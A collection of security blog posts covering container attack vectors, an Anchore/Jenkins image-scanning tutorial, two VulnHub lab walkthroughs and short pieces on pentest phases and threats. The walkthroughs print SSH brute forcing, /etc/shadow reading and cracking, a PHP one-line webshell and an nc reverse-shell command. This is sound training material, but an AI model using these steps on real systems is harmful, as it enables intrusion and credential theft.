Container attack vectors

We live in a containerised world. Container solutions like Docker are now so widespread that they are no longer a niche technology or a buzzword; they are mainstream. Many companies already use them, and the ones that do not are probably dreaming of doing so.

The problem is that they are still something new. Their adoption has been fast, arriving like a storm in all kinds of industries that use technology, but from a security point of view we, as an industry, do not have all the awareness we should. Containers and, especially, containers running in cloud environments partially hide the fact that they exist and that they need to be part of our security considerations. Some companies use them assuming they are completely secure, trusting that the cloud providers or the companies that build the containers take care of everything; for less technology-focused businesses they are even an abstraction rather than a real, tangible thing. They are not the old bare-metal servers, desktop machines or virtual machines people were used to, things that, to a certain point, they worried about because they could be touched.

All of that means that while security concerns for web applications are first-class citizens (not as much as they should be, but the situation has improved a lot in the last few years), security concerns about containers seem to be the black sheep of the family: no one talks about them. And this is not right. They deserve the same level of concern and the same attention, and they should be part of the development life cycle.

In the same way that web applications can be attacked in multiple ways, containers have their own attack vectors, some of which we are going to see here. We will see that some of them can easily be compared with known attack vectors in spaces we are more aware of, like web applications.

Vulnerable application code

Containers package applications and third-party dependencies that can contain known flaws or vulnerabilities. There are thousands of published vulnerabilities that attackers can take advantage of to exploit our systems if they are present in the applications running inside our containers.

The best way to avoid running containers with known vulnerabilities is to scan the images we are going to deploy, and not just as a one-time thing: this should be part of our delivery pipelines, and the scans should run all the time. In addition to known vulnerabilities, scanners should try to find out-of-date packages that need an update. Some available scanners even try to find possible malware in the images.
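
As a minimal sketch, assuming the open-source Trivy scanner (any equivalent image scanner can play the same role) and a placeholder image name, a pipeline step could fail the build when serious vulnerabilities are found:

# fail the pipeline if any HIGH or CRITICAL vulnerability is found
trivy image --exit-code 1 --severity HIGH,CRITICAL myorg/myapp:1.0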

Badly configured container images

When configuring how a container is going to be built, vulnerabilities can be introduced by mistake, or simply because not enough attention is paid to the build process, and later exploited by attackers. A very common example is configuring the container to run with unnecessary root permissions, giving it more privileges on the host than it really needs.
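
A minimal sketch of how to avoid the root-permissions example in a Dockerfile (the base image and file names here are hypothetical):

FROM eclipse-temurin:17-jre
# create an unprivileged user and group instead of running as root
RUN addgroup --system app && adduser --system --ingroup app app
USER app
# hand the application files to that user, not to root
COPY --chown=app:app app.jar /home/app/app.jar
ENTRYPOINT ["java", "-jar", "/home/app/app.jar"]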

Build machine attacks

Like any piece of software, the software we use to run CI/CD pipelines and build container images can be successfully attacked, and attackers can add malicious code to our containers during the build phase, obtaining access to our production environment once the containers have been deployed and even using these compromised containers to pivot to other parts of our systems or networks.

Supply chain attacks

Once containers have been built, they are stored in registries and retrieved, or “pulled”, when they are going to be run. Unfortunately, no one can guarantee the security of these registries, and an attacker can compromise a registry and replace an original image with a modified one that includes a few surprises.
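
Two mitigations worth sketching (the image name and digest below are placeholders): pulling by immutable digest instead of by mutable tag, and enabling Docker Content Trust so that only signed images are pulled:

# pull by digest: the content is cryptographically fixed, so a swapped
# image published under the same tag would not match
docker pull myorg/myapp@sha256:<digest>
# or require signature verification for every pull
export DOCKER_CONTENT_TRUST=1
docker pull myorg/myapp:1.0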

Badly configured containers

When creating configuration files for our containers, e.g. a YAML file, we can make mistakes and give the containers configurations they do not need. Some possible examples are unnecessary access privileges or unnecessary open ports.
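
As a sketch, assuming Kubernetes as the orchestrator (names and image are hypothetical), a pod definition can explicitly switch off the privileges a container does not need:

apiVersion: v1
kind: Pod
metadata:
  name: hardened-app
spec:
  containers:
  - name: app
    image: myorg/myapp:1.0
    ports:
    - containerPort: 8080   # only the port actually needed
    securityContext:
      runAsNonRoot: true
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop: ["ALL"]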

Vulnerable host

Containers run on host machines and, in the same way we try to ensure containers are secure, hosts should be too. Sometimes they run old versions of orchestration components with known vulnerabilities, or other components for monitoring. A good idea is to minimise the number of components installed on the host, configure them correctly and apply security best practices.
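
The Docker Bench for Security project mentioned later in this collection automates many of these host checks; a hedged sketch of its documented usage:

git clone https://github.com/docker/docker-bench-security.git
cd docker-bench-security
sudo sh docker-bench-security.sh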

Exposed secrets

Credentials, tokens and passwords are all necessary if we want our system to be able to communicate with other parts of the system. One risk is the way we supply these secret values to the container and the applications running in it. There are different approaches, with varying levels of security, that can be used to prevent any leakage.
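
A commonly cited comparison, as a sketch with placeholder names: passing a secret as an environment variable exposes it to anyone who can inspect the container, while mounting it as a read-only file narrows the exposure:

# risky: the value shows up in 'docker inspect' and in the process environment
docker run -e DB_PASSWORD=s3cr3t myorg/myapp:1.0
# better: supply the secret as a read-only file the application reads at start-up
docker run -v /run/secrets/db_password:/run/secrets/db_password:ro myorg/myapp:1.0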

Insecure networking

Like non-containerised applications, containers need to communicate over networks, and some attention will be necessary to set up secure connections among components.
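
As one hedged example, Docker user-defined networks can at least segment traffic so that only the containers that need to talk to each other share a network (names and images are placeholders):

# an internal network with no route to the outside world
docker network create --internal backend
# the database is reachable only from containers attached to 'backend'
docker run -d --network backend --name db postgres:15
docker run -d --network backend myorg/myapp:1.0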

Container escape vulnerabilities

Containers are designed to run in isolation from the hosts where they are running. In general, all container runtimes like “containerd” or “CRI-O” have been heavily tested and are quite reliable but, as always, there are vulnerabilities still to be discovered. Some of these vulnerabilities can let malicious code running inside a container escape out into the host. Due to the severity of this, some stronger isolation mechanisms can be worth considering.

Some other risks are related to containers but are not directly about the containers themselves:

  • Attacks on the code repositories of the applications deployed on the containers, poisoning them with malicious code.
  • Hosts accessible from the Internet should be protected as usual with tools like firewalls, identity and access management systems, secure network configurations and others.
  • When containers run under an orchestrator, e.g. Kubernetes, a door to new attack vectors opens. Configurations, permissions or access not properly controlled can give attackers access to our systems.

As we can see, some of the attack vectors are similar to those existing in more mature areas like networking or web applications but, due to the abstraction and the easy-to-use approach, container security is unfortunately often left out of the considerations.

Reference: Liz Rice, Container Security (O’Reilly, 2020). Copyright 2020 Vertical Shift Ltd. ISBN 978-1-492-05670-6.


Container Security: Anchore Engine

Nowadays, containers are taking over the world. We still have big systems and legacy systems and, obviously, not every company out there can move fast enough to migrate to containerized solutions but, wherever you look, people are talking about containers.

And, if you look in the opposite direction, people are talking about security. Breaches, vulnerabilities, systems not properly patched, all kinds of problems that put enterprise security and user data at risk.

With all of this, and it is not new, projects involving both topics have been growing and growing. The ecosystem is huge, and the number of options is starting to be overwhelming.

We have projects like:

  • Docker Bench for Security: The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production. The tests are all automated and are inspired by the CIS Docker Benchmark v1.2.0.
  • Clair: Clair is an open-source project for the static analysis of vulnerabilities in application containers (currently including appc and docker).
  • Cilium: Cilium is open source software for providing and transparently securing network connectivity and load-balancing between application workloads such as application containers or processes. Cilium operates at Layer 3/4 to provide traditional networking and security services as well as Layer 7 to protect and secure use of modern application protocols such as HTTP, gRPC and Kafka. Cilium is integrated into common orchestration frameworks such as Kubernetes and Mesos.
  • Anchore Engine: The Anchore Engine is an open-source project that provides a centralized service for inspection, analysis and certification of container images. The Anchore Engine is provided as a Docker container image that can be run standalone or within an orchestration platform such as Kubernetes, Docker Swarm, Rancher, Amazon ECS, and other container orchestration platforms.
  • OpenSCAP: The OpenSCAP ecosystem provides multiple tools to assist administrators and auditors with assessment, measurement, and enforcement of security baselines. We maintain great flexibility and interoperability, reducing the costs of performing security audits.
  • Dagda: Dagda is a tool to perform static analysis of known vulnerabilities, trojans, viruses, malware & other malicious threats in docker images/containers and to monitor the docker daemon and running docker containers for detecting anomalous activities.
  • Notary: The Notary project comprises a server and a client for running and interacting with trusted collections. See the service architecture documentation for more information.
  • Grafeas: An open artifact metadata API to audit and govern your software supply chain.
  • Sysdig Falco: Falco is a behavioural activity monitor designed to detect anomalous activity in your applications. Powered by sysdig’s system call capture infrastructure, Falco lets you continuously monitor and detect container, application, host, and network activity – all in one place – from one source of data, with one set of rules.
  • Banyan Collector: Banyan Collector is a light-weight, easy to use, and modular system that allows you to launch containers from a registry, run arbitrary scripts inside them, and gather useful information.

As we can see, there are multiple tools within this container security scope. These are just some examples.

In this article, we are going to explore Anchore Engine a bit more: we are going to create a basic Jenkins pipeline to scan one container. For this, we are going to need:

  • A repository in GitHub with a simple dockerized project. In my case, I will be using this one. It’s a simple Spring Boot app with a hello endpoint and a very simple ‘Dockerfile’.
  • A Docker Hub repository to store our image. I will be using this one.
  • Docker and docker-compose.

And, that’s all. Let’s go.

We can see in the next image the pipeline we are going to implement:

Install Anchore Engine

We just need to execute a few commands to have Anchore Engine up and running.

mkdir -p ~/aevolume/config 
mkdir -p ~/aevolume/db/
cd ~/aevolume/config && curl -O https://raw.githubusercontent.com/anchore/anchore-engine/master/scripts/docker-compose/config.yaml && cd - 
cd ~/aevolume
curl -O https://raw.githubusercontent.com/anchore/anchore-engine/master/scripts/docker-compose/docker-compose.yaml

After that, we should see a folder ‘aevolume’ with a content similar to:
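
aevolume
├── config
│   └── config.yaml
├── db
└── docker-compose.yaml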

Running Anchore Engine

As we can see, the previous step has provided us with a docker-compose file to run Anchore Engine in an easy way. We just need to execute the command:

docker-compose up -d

When docker-compose finishes, we should be able to see the two Anchore Engine containers running: one for the application itself and one for the database.
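
A quick way to check is listing the compose services (a sketch; the exact container names depend on the docker-compose file):

docker-compose ps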

Install the Anchore CLI

It is not necessary but, it is going to be very useful to debug integration problems if we have any (I had a few the first time). For this, we just need to execute a simple command that will make the executable ‘anchore-cli’ available in our system.

pip install anchorecli
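
To verify the CLI can reach the engine, something like the following should work (assuming the default credentials and port from the sample config.yaml; adjust them to your values):

anchore-cli --u admin --p foobar --url http://localhost:8228/v1 system status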

Install the Jenkins plugin

Now, we start working on the integration with Jenkins. The first step is to install the Anchore integration in Jenkins. We just need to go to the Jenkins plugin management area and install the one called ‘Anchore Container Image Scanner Plugin’.

Configure Anchore in Jenkins

There is one more step we need to take to configure the Anchore plugin in Jenkins: we need to provide the engine URL and the access credentials. These credentials can be found in the file ‘~/aevolume/config/config.yaml’.

Configure Docker Hub repository

The last configuration we need to do is to add the access credentials for our Docker Hub repository. I recommend generating an access token instead of using our real credentials. Once we have the access credentials, we just need to add them to Jenkins.

Create a Jenkins pipeline

To be able to run our builds and to analyze our containers, we need to create a Jenkins pipeline. We are going to use the script feature for this. The script will look like this:

pipeline {
    environment {
        registry = "fjavierm/anchore_demo"
        registryCredential = 'DOCKER_HUB'
        dockerImage = ''
    }
    agent any
    stages {
        stage('Cloning Git') {
            steps {
                git 'https://github.com/fjavierm/demo.git'
            }
        }
        stage('Building image') {
            steps {
                script {
                    dockerImage = docker.build registry + ":$BUILD_NUMBER"
                }
            }
        }
        stage('Container Security Scan') {
            steps {
                sh 'echo "docker.io/fjavierm/anchore_demo:latest `pwd`/Dockerfile" > anchore_images'
                anchore name: 'anchore_images'
            }
        }
        stage('Deploy Image') {
            steps {
                script {
                    docker.withRegistry('', registryCredential) {
                        dockerImage.push()
                    }
                }
            }
        }
        stage('Cleanup') {
            steps {
                sh '''
                    for i in `cat anchore_images | awk '{print $1}'`; do docker rmi $i; done
                '''
            }
        }
    }
}

This will create a pipeline like:

Execute the build

Now, we just need to execute the build and see the results.
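
Once the analysis has finished, the results can also be queried from the command line with the CLI we installed earlier. A hedged example, using the image name from the pipeline and the same credentials as before:

anchore-cli --u admin --p foobar --url http://localhost:8228/v1 image vuln docker.io/fjavierm/anchore_demo:latest os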

Conclusion

With this, we finish the demo. We have installed Anchore Engine, integrated it with Jenkins, run a build and checked the analysis results.

I hope it is useful.


WALKTHROUGH: De-ICE: S1.100

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “De-ICE: S1.100”.

Information

https://www.vulnhub.com/entry/de-ice-s1100,8/

Scenario

The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – an old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Configuration

PenTest Lab Disk 1.100: This LiveCD is configured with an IP address of 192.168.1.100 – no additional configuration is necessary.

Download

ISO image

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the tools used for this article are included in, or can be installed on, a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be to check that they are on the same network and that we can see the training machine from the testing machine. We can use the “ping” command (which, in this case, is going to fail) or the “netdiscover” command, just to name a couple. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.1.0/24
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the next step is to take a look around, checking the web page that is available. We can see a brief explanation of the challenge and not much more than that. But we can see one very important thing here: reading the page carefully, we can see there are some email addresses related to the company.

Head of HR: Marie Mary - marym@herot.net (On Emergency Leave)
Employee Pay: Pat Patrick - patrickp@herot.net
Travel Comp: Terry Thompson - thompsont@herot.net
Benefits: Ben Benedict - benedictb@herot.net
Director of Engineering: Erin Gennieg - genniege@herot.net
Project Manager: Paul Michael - michaelp@herot.net
Engineer Lead: Ester Long - longe@herot.net
Sr.System Admin: Adam Adams - adamsa@herot.net
System Admin (Intern): Bob Banter - banterb@herot.net
System Admin: Chad Coffee - coffeec@herot.net

We should pay special attention to the last three because they are admin users.

This gives us a few pieces of information:

  • Names of people working in the company.
  • Valid email addresses.
  • Examples of how they create usernames.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.1.100
Figure 2. nmap results

As we can see, there are a few ports open on the training machine:

  • 21: FTP service. And, something is not right here.
  • 22: SSH service
  • 25: SMTP service
  • 80: HTTP service
  • 110: POP3 service
  • 143: IMAP service

Considering we do not have any other information, we need to start thinking about what we are missing. We already have some valid emails; with this information, we can create a list of possible users of the system. In addition, we can add users like “root” or “admin” or similar users that are always useful to have. In this case, our list can be something like:

root
admin
aadams adamsa adamsad adam.adams
bbanter banterb banterbo bob.banter
ccoffee coffeec coffeech chad.coffee

Now that we have a list of possible users, we can try to connect to the SSH service. For this, we are going to use the tool “medusa” to attempt a dictionary attack and see if we are lucky.

medusa -h 192.168.1.100 -U users.txt -P passwds.txt -M ssh -v 4 -w 0
Figure 3. medusa result

As we can see, we have been able to break one password. Let’s use it and try to connect using SSH.

ssh aadams@192.168.1.100
Figure 4. SSH connection with aadams

As we can see, we are able to connect. Now that we are inside, let’s see what “sudo” commands we have available.

sudo -l
Figure 5. Available tools

We can see we can use the tool “cat” to read file contents. So, let’s check the files “/etc/passwd” and “/etc/shadow”.

Figure 6. /etc/shadow content

With a simple copy and paste, we can move the content of both files to our machine to try to use “John” to discover new passwords, especially the “root” password. After the copies are done, we can “unshadow” the files to have everything in one file.

unshadow passwd_file.txt shadow_file.txt > root_password.txt
Figure 7. unshadowing the passwd and shadow files

Trying to save a little bit of time, and because we already have a working user “aadams”, we can copy the “root” credentials to a separate file and try to break just the “root” password.

john just_root.txt
Figure 8. John results

Great! We have the “root” password. Now we can try to connect with SSH using the “root” credentials.

ssh root@192.168.1.100
Figure 9. SSH connection as “root” failing

As we can see, we are not able to connect as the “root” user using SSH. But we still have the “root” password and a valid user, “aadams”. Let’s try to log in as “root” from our valid user.

Figure 10. We are root!

Usually, now that we are root, we could close the case and deliver our report but, looking around a little bit, we can find an interesting file and, considering this is a training exercise, we can play a bit more. The file is this one:

Figure 11. Curious file
Figure 12. Encrypted file, maybe
binwalk salary_dec2003.csv.enc
Figure 13. Confirming it is an encrypted file

What do we know about the file:

  • It is encrypted with OpenSSL.
  • It was in a folder only accessible by the “root” user, so we can guess that maybe it is encrypted using the “root” password we have.
  • We do not know the type of cipher used.

We can check the type of ciphers that OpenSSL offers.

openssl enc help
Figure 14. Available ciphers

Let’s try one of them out of curiosity to see what an error looks like and, after that, let’s try to figure out how to try all of them to find the correct one.

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot
Figure 15. Decrypting the file

I guess it is because this is just a training environment, but the one that does the job is the first one; no more attempts are needed. In the real world, we would probably have to write a script to test all the available ciphers.
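
A rough sketch of such a script, assuming a modern OpenSSL where “openssl enc -list” prints the supported cipher names (each already prefixed with “-”), and reusing the password we cracked. Note that some ciphers will “decrypt” garbage without reporting an error, so the output files still need a manual check:

# try every cipher OpenSSL supports against the encrypted file
for cipher in $(openssl enc -list | tail -n +2); do
    if openssl enc -d "$cipher" -in salary_dec2003.csv.enc \
           -out "salary_dec2003_$cipher.csv" -k tarot 2>/dev/null; then
        echo "Possible cipher: $cipher"
    fi
done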

Figure 16. File decrypted

With this, our scenario finishes: we have access to the machine, we have root permissions and we have decrypted the “salary” file; our job is done. It has been interesting but I think it was only possible because the passwords were not very strong.


Walkthrough: 21LTR: Scene 1

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “21LTR: Scene 1”.

Information

https://www.vulnhub.com/entry/21ltr-scene-1,3/

Scene 1

Your pentesting company has been hired to perform a test on a client company’s internal network. Your team has scanned the network and you have been assigned one of the discovered systems. Perform a test on this system starting from the beginning of your chosen methodology and submit your report to the project manager at scenes AT 21LTR DOT com

Scope Statement

The client has defined a set of limitations for the pentest:

  • All tests will be restricted to the systems identified on the 192.168.2.0/24 network.
  • All commands run against the network and systems must be supplied in the form of script files packaged with the submission of the report.
  • A final report indicating all identified vulnerabilities and exploits will be provided to the company’s engineering department within 90 days of the start of this engagement.

Configuration

Scenario Pentest Lab Scene 1:

This LiveCD is configured with an IP address of 192.168.2.120 – no additional configuration is necessary.

Download

ISO image

Torrent file (Magnet)

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the tools used for this article are included in, or can be installed on, a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be to check that they are on the same network and that we can see the training machine from the testing machine. We can use the “ping” command or the “netdiscover” command, just to name a couple. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.2.0/24
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the next step is to take a look around, checking the web page that is available. In this case, the web page gives us little information and nothing interesting but, the source code of the page gives us the first good lead: as a comment in the page, we can find some credentials.

Figure 2. Credentials found in the source code

There is nothing else to do here but, to be sure we are not missing any pages or folders, let’s run a different tool against the web page to check it. The tool is going to be “dirb”.

dirb http://192.168.2.120
Figure 3. dirb results

We can see that a couple of folders have been found, but the only one that seems to respond in the browser is “/logs”. Unfortunately, it returns a “Forbidden” error.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.2.120
Figure 4. nmap results

As we can see, there are a few ports open on the training machine:

  • 21: FTP service
  • 22: SSH service
  • 80: HTTP service
  • 10001: At this point, I am not sure what this is. In addition, it does not always show up in the scanner results.

Considering we have some credentials, let’s try to connect to the different services. There is no luck with the SSH access but the FTP service allows us to connect and explore. Unfortunately, we can find just one file.

Figure 5. FTP exploration results

Considering we previously found a folder “/logs” and we have now found a file called “backup_log.php”, one good idea is to try the URL we can build with them.

http://192.168.2.120/logs/backup_log.php
Figure 6. Page content

It looks like some kind of backup log system, but it is not giving us enough information to do anything else.

At this point, I must admit that I was a bit lost and running out of ideas so, while I went for a walk, I left “Wireshark” running. Why? Because both are good ideas: going for a walk when you are blocked, and leaving a sniffer running because you never know what you can find in the network. After taking a look at the traffic, I saw some (a lot of) calls asking for the IP address “192.168.2.240”.

Figure 7. Wireshark results

At this point, I decided to change the IP of my testing machine to this address and turn “Wireshark” on again to see what happened and, this time, there was one interesting event: apparently, the training machine wants to establish a connection with “192.168.2.240” (my machine now) on port 10000.

Figure 8. Wireshark results

Then, let’s allow this connection to see what happens. To allow it, let’s execute “netcat” and wait again.

nc -lvvp 10000 > output

Here we can see that the connection is made at some point and that we receive what looks like a binary file, saved as “output”. After some investigation, we can see it is a “tar.gz” file (using exiftool) and we cannot find anything interesting in it, but it is clear that it is a backup file.

Figure 9. Wireshark result
exiftool --list output
Figure 10. exiftool result
Figure 11. Exploring backup file

Linking the facts that the “nmap” scan showed a port 10001 we know nothing about, that the server has a page showing backup result messages, and that we are obviously downloading a backup file, we can infer that maybe port 10001 only opens when the machine is waiting for a response about the backup it has just sent. To test this theory, let’s try to connect to port 10001 when the backup is sent. Because we do not know when that is going to happen, let’s just try to connect repeatedly.

while true; do nc -v 192.168.2.120 10001 && break; sleep 1; clear; done

After a few minutes, the connection is established and we can type a few instructions.

Figure 12. Wireshark results

Apparently, they do nothing but, when we go again to the backup log messages page, we can see what we have been typing.

Figure 13. Messages typed

Then, let’s try to type something that allows us to do something useful and to gain access to the training machine. Let’s try to inject a PHP one-line webshell:

<?php echo exec($_GET["cmd"]);?>

And type something to check if it is working.

curl --silent 192.168.2.120/logs/backup_log.php?cmd=id
Figure 14. Connection result

As we can see (at the end of the image), we are connected to the training machine as “apache”. Now, let’s try to get a proper shell where we can execute commands and take a proper look at the system. We are going to open a port on our system and connect to it with a shell process from the training machine.

nc -lvvp 443
curl --silent 192.168.2.120/logs/backup_log.php?cmd=/usr/bin/nc%20192.168.2.240%20443%20-e%20/bin/sh

And, success, we have our shell.

Figure 15. Shell in the training machine

The next step is to try to find the credential files and see their content but, unfortunately, we can just list the file “/etc/passwd”; the credentials are (I guess) in “/etc/shadow”, which we cannot list.

Our next step is to go around the machine and see what we can find. In this case, after some exploration, we can find a folder “/media/USB_1/Stuff/Keys” with two very interesting files:

  • authorized_keys: With the keys of the users authorized to connect over SSH. In this case, “hbeale”.
  • id_rsa: The private key to connect over SSH.
Figure 16. User with SSH access
Figure 17. Private key

Copying the key to our system, we can try to connect.

ssh hbeale@192.168.2.120
Figure 18. SSH access
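
One detail worth noting (a sketch, assuming the private key was saved locally as “id_rsa”): SSH refuses private key files with loose permissions, so something like this is needed before connecting:

chmod 600 id_rsa
ssh -i id_rsa hbeale@192.168.2.120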

Let’s check what commands we can execute as “sudo”. We can see we can use the tool “cat” to read file contents.

sudo -l
Figure 19. Available tools

Then, let’s check the file “/etc/shadow” again.

Figure 20. /etc/shadow content

Here we can see the hash for the “root” user and we can copy it to a file in our system (root_password). Let’s try to increase our privileges by cracking the hash with “John” (the tool John the Ripper), using one of the dictionaries that come with Kali.

john --wordlist=rockyou.txt root_password
Figure 21. John’s execution

We are lucky: John has done its job properly and we have the password “formula1”. Let’s try it.

Figure 22. We are root!

With this, our scenario finishes: we have access to the machine and we have root permissions; our job is done. It has been fun and frustrating, but I do not think there would have been the first without the second.


Network security zoning

The world is a wild place, especially when we are talking about the Internet. There are multiple threats and multiple sources of attack. Organizations, in general, need to find the best ways to protect themselves and guarantee the continuity of their business online.

One of the best ways to build their defenses is to create different layers or zones in their infrastructures. A network security zoning mechanism allows an organization to manage a secure network environment by selecting the appropriate security levels for different zones of Internet and intranet networks. It helps to effectively monitor and control inbound and outbound traffic.

There are several different zones we can define; the decision about which ones are going to be present in a concrete infrastructure needs to be carefully analyzed in each case. As an example, we are going to see a few of the possible zones we can implement.

  • Internet zone: Obviously, this is not a zone we implement; it is something that is there and that we just connect to. In general, we can define this zone as an uncontrolled zone that is outside the boundaries of our organization.
  • Internet DMZ: This is a controlled zone that provides a buffer between the internal network and the Internet.
  • Production network zone: This is a restricted zone with strict access controls to prevent uncontrolled traffic.
  • Intranet zone: A controlled zone without heavy restrictions. It is supposed to be a controlled environment where only trusted systems and/or traffic can be found.
  • Management network zone: A highly restricted zone, with strong controls and strict policies to keep out unauthorized users and traffic.

As you can see, this is just a basic list to exemplify some of the different zones we can implement in our networks.
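
As a rough illustration only, with hypothetical interfaces and addresses, a Linux firewall sitting between these zones could enforce the direction of the allowed traffic:

# default: no traffic is forwarded between zones
iptables -P FORWARD DROP
# the Internet (eth0) may reach only the DMZ web server (eth1) on port 443
iptables -A FORWARD -i eth0 -o eth1 -d 10.0.1.10 -p tcp --dport 443 -j ACCEPT
# the intranet (eth2) may open connections towards the DMZ, not the reverse
iptables -A FORWARD -i eth2 -o eth1 -j ACCEPT
# allow replies to connections that are already established
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT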

See you.


Penetration testing phases

When we talk about penetration tests, a lot of people think that it is just a matter of starting our computers, running a few tools against the objective, doing a bit of magic and, done, the pentester discovers a few vulnerabilities. But the truth is far from this point of view; maybe in films it is something like that, but not in real life.

A pentest is a well-defined process and it has its methodologies, like OSSTMM, OWASP and some others. All of them define concrete steps and procedures that a pentester should follow to perform the task properly.

One of the things that is well defined is the set of phases of a pentest, each one specifying what needs to be done and when it needs to be done. The tools used to complete each of these phases are not important here; in this article, only the process matters.

We can find five different phases in a pentest, each one with its boundaries, objectives and goals well defined. These five phases are:

  • Reconnaissance
  • Scanning
  • Gaining access
  • Maintaining access
  • Clearing tracks

Let’s see a little introduction to each of the phases.

Reconnaissance

Reconnaissance refers to the preparatory phase where an attacker seeks to gather information about a target prior to launching the attack; in other words, finding all the information at our fingertips. The attackers are going to use all the public sources they can reach to find information about the target. And we are not talking just about the company: we are talking about employees, business, operations, network, systems, competitors, … everything we can learn about our target. We can use web pages, social networks, social engineering, … The objective is to know as much as we can about the victim and the elements around it.

We can find two types of reconnaissance:

  • Passive: Involves acquiring information without directly interacting with the target.
  • Active: Involves interacting with the target directly by any means. The sketch below shows an example of each.
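
A hedged example of each type (the domain is a placeholder):

# passive: query public registration records; the target never sees us
whois example.com
# active: touch the target's infrastructure directly
ping -c 4 www.example.com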

Scanning

Scanning refers to a pre-attack phase where the attacker scans the network for specific information on the basis of the information gathered during reconnaissance. In general, in this step we are going to use port scanners, vulnerability scanners and similar tools to obtain information about the target environment: live machines, open ports on each of those machines, running services, OS details, … All this information will allow us to launch the attack.
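
As an example, the kind of command used in the walkthroughs earlier in this collection belongs squarely to this phase (the target address is a placeholder):

# scan the full TCP port range with service/OS detection and verbose output
nmap -p 1-65535 -T4 -A -v 192.168.1.100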

Gaining access

Gaining access refers to the point where the attacker obtains access to a machine or application inside the target’s network. Part of this phase is when the attacker tries to escalate privileges to obtain complete control of the system or, based on the access already obtained, tries to compromise other systems in the network. Here we have multiple tools and different possibilities like password cracking, denial of service, buffer overflows, session hijacking, …

Maintaining access

Maintaining access refers to the phase where the attacker tries to retain ownership of the system and make future access to the compromised system easier, especially in case the path the attacker used to compromise the system gets fixed. The attacker can do multiple things like creating users in the system, installing their own applications and hiding them, or installing backdoors, rootkits or trojans; in some cases, the attacker can even secure the compromised machine to prevent other attackers from taking control of it.

Clearing tracks

Clearing tracks refers to the activities carried out by an attacker to hide malicious acts. In this phase, the attacker tries to remove all the evidence of the machine being compromised, trying to avoid, in the first place, detection and, in the second place, to obstruct any prosecution.

These are the different phases of a pentest, and any service offered should perform all of them properly. In addition, one of the best things about performing all the phases correctly, and in the adequate order, is that we can use the information found in one phase to complete the next one.

See you.


Elements of Information Security

Information security is a state of well-being of information and infrastructure in which the possibility of theft, tampering and disruption of information and services is kept low or tolerable.

Information security has the following elements:

  • Confidentiality: Assurance that the information is accessible only to those authorized to have access.
  • Integrity: The trustworthiness of data or resources in terms of preventing improper and unauthorized changes.
  • Availability: Assurance that the systems responsible for delivering, storing and processing information are accessible when required by the authorized users.
  • Authenticity: Authenticity refers to the characteristic of a communication, document or any data that ensures the quality of being genuine.
  • Non-repudiation: Guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received it.

See you.


Security threats

Nowadays, there is so much technology coming out and being pushed to consumers and, one of the main problems is that they have no idea how it operates. They just know that it works and that it has this or that cool feature, but they do not imagine that each one of these new features can come with new vulnerabilities. We can discuss whether the normal user needs to know about vulnerabilities, security or the proper configuration of new devices and features; however, that discussion should be a thing of the past. Today, everyone should have a basic knowledge of all this. It is clear that, except in a few cases, there is going to be a big difference between the knowledge a standard user has and the knowledge an IT person has; obviously, one of them is just using the products and the other is managing them and, almost all the time, doing it for companies or enterprises that expect a certain level of expertise. But it does not matter who you are or what you do: the simple and undeniable truth is that everyone nowadays should have, at least, some knowledge about the threats around them when they are using technology because today, technology is everywhere.

This article is focused on IT people but, I think it can be useful for everyone who uses technology and is aware that they need to know, or who is just curious.

There are several different issues that can be considered threats in the world of computer security, and anyone involved in this world should be aware of them to try to avoid or mitigate their effects. This is just a list of threats, not an explanation of how to mitigate their effects. We can divide threats into different categories:

  • Host threats: And I am not talking just about servers used to deploy applications; into this category fall servers, workstations, tablets and cell phones, anything that has an operating system installed and can be connected to the Internet. We can have in this category things like:
    • Footprinting: Every computer and every operating system answers the same questions in different ways. This allows attackers to investigate and obtain information about our infrastructure.
    • Physical security: Things like not locking your laptop when you are not around, not locking your screen, or spending a lot of time hardening your server when it is quite easy to gain physical access to it.
    • Password threats: Having a password should not be enough; we should have proper passwords, defined in a password policy and with enough restrictions to consider them secure.
    • Malware: A growing threat nowadays; day after day we can see more cases of malware. We should have control over what is installed on our hosts and what the hosts are executing. We should not install things just by clicking the “Next” button without reading the different screens of the wizards; this is how you end up with new bars in your browser or applications you do not recognise.
    • Denial of Service: It does not matter if it is intentional or unintentional; the result is that your system is not going to be available, and you can lose money, customers, reputation, …
    • Unauthorized access: No one who is not allowed to use a system should be able to log into it, period.
    • Privilege escalation: It is closely related to the previous one: if I can access the system illegitimately, I can try to obtain more privileges in it, for example by creating accounts with more privileges.
    • Backdoors: One of the things attackers are going to do after gaining access to our systems is to create a backdoor to be able to return later and access the system again in an easier way. One very common way to do that is creating service accounts. For this reason, this is one of the things we should review.
  • Natural and physical threats:
    • Natural disasters: Earthquakes, hurricanes, floods or any other natural disaster. Obviously, trying to prevent this kind of event is out of the question, but we should have the proper plans, procedures and policies to try to mitigate their effects.
    • Physical threats: Thefts, dropping the laptop or the cell phone, anything that can directly affect the physical device. We need to be prepared to mitigate the loss of information.
